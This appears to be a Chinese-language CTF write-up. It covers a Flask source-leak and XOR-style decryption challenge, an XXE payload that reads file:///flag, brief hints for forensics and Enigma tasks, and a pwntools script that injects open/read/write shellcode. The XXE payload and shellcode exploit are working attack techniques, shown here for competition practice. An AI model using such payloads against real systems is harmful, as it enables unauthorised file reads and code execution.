情报收集

访问 file?name=app.py，即可拿到源码

import os  
from flask import Flask, request, render_template
from config import *
# author: gamelab

app = Flask(__name__)

# Simulated sensitive information (value comes from config via the star import above)
sensitive_info = SENSITIVE_INFO

# Encryption key used by simple_encrypt (also provided by config)
encryption_key = ENCRYPTION_KEY

def simple_encrypt(text, key):
    """Return ``text`` as a hex string, each character shifted by the key.

    Output byte ``i`` is ``ord(text[i]) + ord(key[i % len(key)])``, so the key is
    repeated cyclically over the text. ``bytearray.append`` rejects values above
    255, so the sum must stay in one byte; an empty ``key`` with a non-empty
    ``text`` raises ZeroDivisionError. Returns ``""`` for empty ``text``.
    """
    key_len = len(key)
    shifted = bytearray()
    for idx, plain_char in enumerate(text):
        shifted.append(ord(plain_char) + ord(key[idx % key_len]))
    return shifted.hex()

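# Hex ciphertext of the sensitive value; it is embedded in the simulated log below.
encrypted_sensitive_info = simple_encrypt(sensitive_info, encryption_key)

# Simulated log file content
log_content = f"用户访问了 /secret 页面,可能试图获取 {encrypted_sensitive_info}"

# Simulated hidden file content
hidden_file_content = f"解密密钥: {encryption_key}"

# Root directory that the /file route is allowed to serve from
SAFE_ROOT_DIR = os.path.abspath('/app')
# Explicit UTF-8: the content is non-ASCII, so relying on the locale default
# encoding could raise UnicodeEncodeError on a non-UTF-8 locale.
with open(os.path.join(SAFE_ROOT_DIR, 'hidden.txt'), 'w', encoding='utf-8') as f:
    f.write(hidden_file_content)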

@app.route('/')
def index():
    """Render the landing page template."""
    page = 'index.html'
    return render_template(page)

@app.route('/logs')
def logs():
    """Render the simulated log page with the module-level ``log_content``."""
    context = {'log_content': log_content}
    return render_template('logs.html', **context)

@app.route('/secret')
def secret():
    """Render the /secret page template."""
    page = 'secret.html'
    return render_template(page)

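@app.route('/file')
def file():
    """Serve a text file from SAFE_ROOT_DIR selected by the ``name`` query parameter.

    Renders ``file_content.html`` with the file's text, or ``no_file_name.html``
    when the parameter is missing, ``no_premission.html`` when the resolved path
    lies outside SAFE_ROOT_DIR or contains ``config``, and ``file_not_found.html``
    when the path does not exist or is a directory.
    """
    file_name = request.args.get('name')
    if not file_name:
        return render_template('no_file_name.html')
    full_path = os.path.abspath(os.path.join(SAFE_ROOT_DIR, file_name))
    # Containment is checked on path components rather than with a plain string
    # prefix: startswith('/app') would also accept a sibling such as '/app2/x'.
    # The 'config' substring check is a blocklist over the whole path; kept as-is.
    inside_root = os.path.commonpath([SAFE_ROOT_DIR, full_path]) == SAFE_ROOT_DIR
    if not inside_root or 'config' in full_path:
        return render_template('no_premission.html')
    try:
        # Explicit encoding so the read does not depend on the process locale.
        with open(full_path, 'r', encoding='utf-8') as f:
            content = f.read()
        return render_template('file_content.html', content=content)
    except (FileNotFoundError, IsADirectoryError):
        # A missing file and a directory name (e.g. name='.') both get the not-found page.
        return render_template('file_not_found.html')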

if __name__ == '__main__':
    # NOTE(review): debug=True enables Flask's debug mode and host='0.0.0.0'
    # binds all interfaces; presumably intended for the CTF container only.
    app.run(debug=True, host='0.0.0.0')

审计发现有加密逻辑,根据源码找到密钥和密文。
# Hex ciphertext recovered from the challenge (presumably the value shown on /logs)
text = "d9d1c4d9e0a48fcec8df61986964ac9794d692a8c5a4cba66a6b696ea0c693d698a68f9bc8da676596b4"  
# Key recovered from the source / hidden file, as described in the write-up
key = "secret_key1547"
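def simple_encrypt(text, key):
    """Return ``text`` as a hex string, each character shifted by the key.

    Output byte ``i`` is ``ord(text[i]) + ord(key[i % len(key)])`` (key repeated
    cyclically). A debug line is printed per character. The sum must fit in one
    byte or ``bytearray.append`` raises ValueError.
    """
    encrypted = bytearray()
    for i, char in enumerate(text):
        key_char = key[i % len(key)]
        encrypted.append(ord(char) + ord(key_char))
        # The original printed hex(char) on a str, which raises TypeError on the
        # first iteration; report the byte just appended instead.
        print(f"Encrypted char: {char}, Key char: {key_char}, Hex: {hex(encrypted[-1])}")
    return encrypted.hex()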
def simple_decrypt(encrypted_text, key):
    """Invert simple_encrypt: parse two hex digits per byte and subtract the key.

    Byte ``j`` becomes ``int(hex_pair_j, 16) - ord(key[j % len(key)])``; the
    running bytearray is printed after each step and the result is decoded as
    UTF-8. A negative difference raises ValueError from ``bytearray.append``.
    """
    key_len = len(key)
    recovered = bytearray()
    for pair_start in range(0, len(encrypted_text), 2):
        byte_value = int(encrypted_text[pair_start:pair_start + 2], 16)
        key_char = key[(pair_start // 2) % key_len]
        recovered.append(byte_value - ord(key_char))
        print(recovered)
    return recovered.decode('utf-8')
# Decrypt the recovered ciphertext with the recovered key and print the result
flag = simple_decrypt(text, key)
print(flag)


XML

XXE漏洞

<!DOCTYPE ANY [  
<!ENTITY test SYSTEM "file:///flag">
]>
<user><username>&test;</username><password>123</password></user>


flowzip

流量包分析,翻着翻着就找到了。

ezEvtx

Windows 系统中，事件 ID 4663 表示对象（如文件）访问成功的审计事件。

Enigma

将题目给出的密文复制，
粘贴到本地的 CyberChef 中，使用 Enigma 操作解密即可

ShadowPhases

动态调试可出

RuneBreach

orw类型题

#!/usr/bin/env python3  
# RuneBreach solve script (pwntools), as described in the write-up: answers the
# program's prompts, reads back the address it prints, then sends the
# open/read/write ("orw") shellcode.

from pwn import *

context.update(os='linux', arch='amd64', log_level='debug', terminal=['tmux', 'splitw', '-h'])

sh = process("./chall")
elf = ELF('./chall')
# sh = remote("", )

# Decline the four "Defend?" prompts, then wait for the game-over banner
sh.sendlineafter(b"\nDefend? (y/N): ", b'N')
sh.sendlineafter(b"\nDefend? (y/N): ", b'N')
sh.sendlineafter(b"\nDefend? (y/N): ", b'N')
sh.sendlineafter(b"\nDefend? (y/N): ", b'N')
sh.recvuntil(b"\n[System] Game Over...\n")
sh.recvuntil(b'Your place is mine now ')
# 14 bytes following that text are parsed as a hex address
addr = int(sh.recv(14), 16)
print("addr", hex(addr))
shellcode = shellcraft.open('/flag') # open the flag file
shellcode += shellcraft.read(3, addr, 0x50) # read the flag into the mmap region at addr
shellcode += shellcraft.write(1, addr, 0x50) # write the flag contents to stdout

sh.recvuntil(b'[BOSS] Say your last word to your territory: ')
sh.sendline(asm(shellcode))
sh.interactive()

还是比较菜,不太会哟

本地跑出来